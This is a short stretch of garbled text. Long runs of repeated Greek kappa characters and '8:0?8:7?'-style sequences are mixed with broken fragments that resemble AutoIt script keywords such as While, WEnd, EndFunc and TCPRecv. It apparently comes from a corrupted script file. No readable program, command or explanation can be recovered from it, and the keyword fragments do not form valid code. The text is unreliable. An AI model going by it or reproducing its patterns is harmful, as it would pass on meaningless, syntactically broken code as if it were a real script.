funκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκ]κκκκκκκκκκκκ8:0?8:7?8:1?8:0?W+8:''End$4
$Enn$b+''WEnile b+''WEn
EnddFuNc)dc(dc(dc()κκκκκκκκκκκκκκκκκκκκκκκκκκκκκκ]κκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκwH$1$2$R$b+''WEnd
$
While„$n2winflashe$4$2
While$nEndFunc“wH$0$2$R$b+''d
$ 
While„$n2
Wile n$1$2$R$b+κκκκκκκκκκκκκκκκκκ1?8:0?8:0?8:1?8:1?8:3?8:7?8:7?8:0?8:1?8:7?7:0?8:0?8:1?8:1?8:7?8:1?1:8?8:7?8:κκκκκκκκκκTCPRecvκκκκκκκκκκκκκκκκκκκκκκκκ]κκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκ]κκκκκκκκκκκκ8:0?8:7?8:1?8:0?W+8:''End$4
$Enn$b+''WEniκκκκκ]κκκκκκκκκκκκκκκκκκκκκο 
While„$n2
Wile n$1$2$R$b+κκκκκκκκκκκκκκκκκκ1?8:0?8:0?8:1?8:1?8:3?8:7?8:7?8:0?8:1?8:7?7:0?8:0?8:1?8:1?8:7?8:1?1:88?:7?8:κκκκκκκκκκκκκκκ''WEnd$4
$nfl0?8:7?8:1?8:0?8:1?8:0?8:0?8:1?8:1?8:3?8:1?8:3?8:1?8A:1?8:7?8:0?8:$R$b+''d
$ 
While„$n2
Wile n$1$2$R$b+''WEnd:1?8:0?8:1?8:0?8:7?x:7?7:0?8:0?8:1?8:1?8:7?8:1?1:8?8:7?8:$4
$Enn$b+''W0?8:7?8:1?8:0?8:1?8:0?8:0?8:1?8:1?88:3?8:1?8:1?8:7?8:0?8:7?8:0?8:7?8:1?0:0?8:1?8:0?8:0?8:0?8:0?8:1?:8?8:7?8:κκκκκκκκκκTCPRecvκκκκκκκκκκκκκκκκκκκκκκκκ]κκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκ]κκκκκκκκκκκκ7:0?8:7?8:κκκκκκκκκ''WEnd$4
$nfl0?8:7?8:1?8:0?8:1?8:0?8:0?8:1?8:1?8:3?8:1?8:3?8:1?8A:1?8:7?8:0?8:$R$b+''d
$ 
While„$n2
Wile n$1$2$R$b+''WEnd:1?8:0?8:1?8:0?8:7?x:7?7:0?8:0?8:1?8:1?8:7?8:1?1:8?8:7?8:$4
$Enn$b+''W0?8:7?8:1?8:0?8:1?8:0?8:0?8:1?+''WEnd:1?8:0?8:1?8:0?8:7?x:7?7:0?8:0?8:1?8:1?8:7?8:1?1:8?8:7?8:$4
$Enn$b+''W0?8:7?8:1?8:0?8:1?8:0?8:0?8:1?$F
u($B$B$B$B$B$B$8:1?8:2?8:1?8:3?8:1?8:1?8:7?8:0?8:7?8:1?80XBBBBBBBBBBBBBBBB)0XFBCBBBBBBBBBBBBB:3?8:7?8:7?8:7?8'WEndκ)):1?8: